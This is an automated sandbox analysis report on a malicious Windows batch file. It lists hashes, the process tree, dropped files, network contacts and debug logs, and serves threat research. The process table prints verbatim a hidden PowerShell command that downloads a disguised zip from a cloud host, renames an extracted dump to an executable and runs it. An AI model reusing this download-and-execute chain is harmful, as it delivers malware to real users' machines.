File name: | _ëyDT.bat |
Full analysis: | https://app.any.run/tasks/c8eeb8a0-86f4-4e0e-8279-b9a6e9fdce9d |
Verdict: | Malicious activity |
Analysis date: | September 30, 2020, 13:49:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 7572B0D2667128910D3FD85961F4F178 |
SHA1: | 0B799F611012C2919D7D9FA8B3F6C8548C0FFD40 |
SHA256: | 55DE7B3BBA150A8A045CA21A8912E971E42899131920D15D2FD3E97AD46343A2 |
SSDEEP: | 48:B+A3jyj7w4BgLS2SlB24tzEE5Xe0WjFGcfXGPuqepDDXpt:53jyj7w4E9SlBrtD0pJRD1t |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3704 | cmd /c ""C:\Users\admin\AppData\Local\Temp\_ëyDT.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2396 | C:\Windows\system32\cmd.exe /c echo %charpool:~15,1% | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
552 | powershell.exe -windowstyle hidden -Command "& {Import-Module BitsTransfer;Start-BitsTransfer 'https://gjkegwe.s3-eu-west-1.amazonaws.com/image2.png' 'C:\Users\admin\_f\.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\Users\admin\_f\.zip');foreach($item in $zip.items()){$shell.Namespace('C:\Users\admin\_f').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\Users\admin\_f\dump.dmp') -newname ('.dmp');rename-item -path ('C:\Users\admin\_f\dump2.dmp') -newname ('.exe');remove-item 'C:\Users\admin\_f\.zip';Start-Sleep -s 5 ;Start-Process ('C:\Users\admin\_f\.exe')}" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3268 | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" | C:\Windows\System32\SearchProtocolHost.exe | — | SearchIndexer.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft Windows Search Protocol Host Version: 7.00.7600.16385 (win7_rtm.090713-1255) | ||||
3840 | "C:\Users\admin\_f\.exe" | C:\Users\admin\_f\.exe | powershell.exe | |
User: admin Company: AVAST Software Integrity Level: MEDIUM Description: Avast Dump Process Exit code: 3 Version: 18.7.4041.0 | ||||
2680 | "C:\Program Files\Internet Explorer\iexplore.exe" | C:\Program Files\Internet Explorer\iexplore.exe | .exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) |
PID | Process | Filename | Type | |
---|---|---|---|---|
552 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MQ4VYD2E4YLCSHC0HLOY.temp | — | |
MD5:— | SHA256:— | |||
552 | powershell.exe | C:\Users\admin\_f\dump.dmp | — | |
MD5:— | SHA256:— | |||
552 | powershell.exe | C:\Users\admin\_f\.dmp | — | |
MD5:— | SHA256:— | |||
552 | powershell.exe | C:\Users\admin\_f\dump2.dmp | executable | |
MD5:9B7D6EFF018883DC951A4FB5A1418A93 | SHA256:9F33291224985B73C145D6154BC97BB92964F61D3FD9AC7A7F072A96447E9B3C | |||
552 | powershell.exe | C:\Users\admin\_f\.exe | executable | |
MD5:9B7D6EFF018883DC951A4FB5A1418A93 | SHA256:9F33291224985B73C145D6154BC97BB92964F61D3FD9AC7A7F072A96447E9B3C | |||
552 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4028388263805ABA00088A0BA4EEA515 | SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 | |||
552 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bc0d0.TMP | binary | |
MD5:4028388263805ABA00088A0BA4EEA515 | SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 | |||
552 | powershell.exe | C:\Users\admin\_f\borlndmm.dll | executable | |
MD5:0CF6C24C611C58FE8B85DA545DD68364 | SHA256:1C7FF99399A59491C7C016681EF3BE2890DCE818C3D6CCF2F18D27F2EEB3ACE9 | |||
552 | powershell.exe | C:\Users\admin\_f\ssleay32.dll | executable | |
MD5:A71BB55BE452A69F69A67DF2FE7C4097 | SHA256:FF6C7F1C9DCFF3B3A90CF57A9B4341DDA0D76ADB9E8667B4A3F75E15A2B7A832 | |||
552 | powershell.exe | C:\Users\admin\_f\dbghelp.dll | executable | |
MD5:FB8B818F81A3172194D1F6BBDCBBAD4B | SHA256:8A500A36B1E94380B06330830E63459E70A7C8473DEB92A087F320466B19C191 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2680 | iexplore.exe | 170.82.173.10:443 | www.localizaip.com.br | 3L CLOUD INTERNET SERVICES LTDA - EPP | BR | malicious |
— | — | 52.218.29.232:443 | gjkegwe.s3-eu-west-1.amazonaws.com | Amazon.com, Inc. | IE | unknown |
Domain | IP | Reputation |
---|---|---|
gjkegwe.s3-eu-west-1.amazonaws.com |
| unknown |
www.localizaip.com.br |
| unknown |
dns.msftncsi.com |
| shared |
www.goole.com |
| suspicious |
Process | Message |
---|---|
iexplore.exe | [REM => lnag 1 |
iexplore.exe | [REM => Start.. |
.exe | [2020-09-30 13:49:53.840] [fatal ] [dump ] [ 3840: 3232] DumpProcess failed
Exception: Error: Argument parsing failed
Code: 0x00000003 (3)
Exception: Not enough arguments supplied
Code: 0x000000a0 (160)
|
iexplore.exe | [REM => ERROR_NetwokFullInformation :Socket Error # 10060
Connection timed out. - EIdSocketError |
iexplore.exe | [REM => Iniciar.. |
iexplore.exe | [REM => Iniciar.. |
iexplore.exe | [REM => C:\Users\admin\AppData\Local\Temp |
iexplore.exe | [REM => C:\Users\admin\_f\ |
iexplore.exe | [REM => C_DIR =>C:\Users\admin\_f\ |
iexplore.exe | [REM => NAME_IS =>C:\Users\admin\_f\ |